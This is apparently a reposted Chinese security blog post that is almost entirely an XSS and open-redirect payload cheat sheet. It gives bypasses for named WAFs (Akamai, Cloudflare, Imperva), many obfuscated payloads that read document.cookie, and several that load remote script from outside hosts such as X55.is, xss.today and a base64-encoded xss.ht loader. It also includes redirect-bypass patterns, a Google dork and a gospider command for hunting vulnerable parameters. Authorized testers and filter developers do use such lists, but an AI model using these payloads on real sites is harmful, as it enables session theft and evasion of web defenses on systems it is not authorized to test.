XSS
-
测试不同编码方式并检查是否存在任何奇怪的行为 -
<"'`--!> -
如果反应为< %3c --> 测试双重编码 -
https://github.com/InfoSecOne/ghettoBypass -
https://github.com/masatokinugawa/filterbypass/wiki/Browser%27s-XSS-Filter-Bypass-Cheat-Sheet -
逆向工程开发者的思维
CSP
-
CSP审查工具
1. %3C/script%20%3E
2. mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
3. “><img src onerror=document.body.appendChild(Object.assign(document.createElement('script'),{src:'https:'.concat(String.fromCharCode(47)).concat(String.fromCharCode(47)).concat('externaljshere')}));>
4.
Waf
Akamai JSi
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
CloudFlare HTMLi
<Img Src=OnXSS OnError=alert(1)>
<Img Src=OnXSS OnError=confirm(document.cookie)>
Imperva HTMLi
<Img Src=//X55.is OnLoad%0C=import(Src)>
工具和资源
-
cheat-sheet -
Dom-xss-burp
Referer xss
-
window.history.replaceState() 替换历史来替换referer -
https://webhook.site/ -
CRLF
<body>
<a
href="https://www.marksandspencer.com.tr/cerez-politikasi?1111"
referrerpolicy="unsafe-url"
>
click me
</a>
<script>
window.history.replaceState(null,"","1.html")
</script>
</body>
Url跳转
重定向过程中会
深度利用
-
windows.location: 寻找xss -
后端判定:寻找ssrf
bypass
/xxx.com
//xxx.com
\xxx.com
//xxx.com
//[email protected]
//xxx.com
https://xxx.com%2Fdomain.com
https://xxx.com%2523.domain.com
https://xxx.com?c=.domain.com (# 也可以)
//%2F/xxx.com
////xxx.com
https://domain.computer/
https://domain.com.xxx.com
/%0D/xxx.com(%09 , %00, %0a, %07, %2F)
/%5Cxxx.com
//google%E3%80%82com
& ? # /
google dork
inurl:url= | inurl:return= | inurl:return_url= | inurl:rUrl=| inurl:r_url= | inurl:next= | inurl:cancelUrl= | inurl:goto= | inurl:follow= | inurl:returnTo= | inurl:history= | inurl:redirect= | inurl:redirectTo= | inurl:redirectUrl= | inurl:goback= | inurl:redir= | inurl:redirUrl= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com
gospider
gospider -w -r -a -s https://wwww.xxx.com | grep -E "callback|%2F|redirect|url=|return|rurl|r_url|next|cancelUrl|goto|follow|returnto|history|goback|redir=|ret=|r2=|page=|jump=|target="
Waf xss payload
"><img/src/onerror=import('//domain/')>"@yourdomain
013371337;ext=<img/src/onerror=import('//domain/')>
<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert(document.cookie)>
<svg onload=alert("1")><””>
<Img Src=//X55.is OnLoad%0C=import(Src)>
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
%3Csvg%20onload=alert(%22MrHex88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
"><svg onmouseover="confirm(document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>")
<a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe
<Script>window.valueOf=alert;window%2B1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)>
- 1'"();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")
'"><img src=x onerror=alert("xss!")>.pdf
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dcou006efirm%26%23x28%3b%26%23x29%3b>
"><track/onerror='confirm%601%60'>
"><track/onerror='confirm`1`'>
%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E
<vIdeO><sourCe onerror="['alu0065'+'rt'][0]['x63onstructor']['x63onstructor']('return this')()[['alu0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<video><source onerror="alert.constructor.constructor('return this')().alert('0f')">
<a href="#" id="uniqueLink">Click me</a> <script> (function() { var a = ['x6Fx70x65x6E', 'x77x72x69x74x65', 'x63x6Cx6Fx73x65', 'x70x72x69x6Ex74', 'x61x6Cx65x72x74']; var b = ['@', 'h', 'x', 'l', 'x', 'm', 'j']; var c = ['B', '1', 'P', '4', '$', '$']; document.getElementById('uniqueLink').onclick = function() { var w = window[a[0]](); w.document[a[1]](b.join('')); w.document[a[2]](); w[a[3]](); window[a[4]](c.join('')); }; })(); </script>
<sCrIpT>(function(){var a=[97,108,101,114,116];var
b=String.fromCharCode.apply(null,a);var c=[88,115,112,108,111,105,116];var d=String.fromCharCode.apply(null,c);window[b](d);})()</sCrIpT>
<DiV sTylE="WidTH:100%;HeIgHt:100vH;" oNpOINteROvEr="var _0x1abc=['x63','x6F','x6E','x73','x74','x72','x75','x63','x74','x6F','x72'];var _0x2bcd=['x61','x6C','x65','x72','x74','x28','x64','x6F','x63','x75','x6D','x65','x6E','x74','x2E','x64','x6F','x6D','x61','x69','x6E','x29'];[][_0x1abc.join('')][_0x1abc.join('')](_0x2bcd.join(''))((97^0)===97?1:0);"></dIV>
<div style="width:100%;height:100vh;" onpointerover="[][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')](decodeURIComponent('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))()"> </div>
<div onpointerover="javascript:eval(decodeURIComponent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>
<div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div>
<svg onload=(function(){let arr=[41,49,40,116,114,101,108,97].reverse().map(e=>String.fromCharCode(e));let func=new Function(...arr);func();})()>
<svg onload="alert(1)"></svg>
jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/(/*%252f%252a*/*┯┪prompt(1)┯┻/**/;eval(atob('YWxlcnQoIkhpISIp'))//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/)//
<select><noembed></select><script x='a@b'a> y='a@b'//a@b%0au0061lert('CYBERTIX')</script x>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
"'`><x3Cimg src=xxx:x onerror=javascript:alert(1)>
<math><x xlink:href=javascript:confirm`1`>click
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<svg onload=alert(document.cookie)>
JavaScript://%250Aalert?.(1)//
'/*'/*"/*"/*`/*`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//google.com76-->
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(cou006efirm);abc%28%60xss%60%26%230000000000000000041//
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
javascript:%ef%bb%bfalert(XSS)
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<svg onload="[]['146151154164145162']['143157156163164162165143164157162'] ('141154145162164506151')()">
"><video><source onerror=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
"><track/onerror='confirm%601%60'>
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==hashtag#x" /></svg>
"`'><script>xE2x80x87javascript:alert(1)</script>
<img/src=x onError="`${x}`;alert(`Hello`);">
"`'><script>xE2x80x87javascript:alert(1)</script>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"/><img%20s+src+c=x%20on+onerror+%20="alert(1)">
"><track/onerror='confirm%601%60'>
<svg/onload=location=‘javas’%2B‘cript:’%2B
‘ale’%2B‘rt’%2Blocation.hash.substr(1)>#(1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<SCRIPT>location=%27javasCript:alertx281x29%27</SCRIPT>
';k='e'%0Atop['al'+k+'rt'](1)//
"';k='e'%0Atop['al'+k+'rt'](1)//"
<Img Src=//X55.is OnLoad%0C=import(Src)>
<img/src/onerror=alert/1337/(1)>
<img/src/onerror=alert//
(2)>
<img/src/onerror=alert//(3)>
'"/><script%20>alert(document.domain)<%2fscript>.css
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)
login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<details%0Aopen%0AonToGgle%0A=%0Aabc=(cou006efirm);abc(VulneravelXSS%26%2300000000000000000041//
原文始发于微信公众号(白安全组):XSS挖掘工具资源分享
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论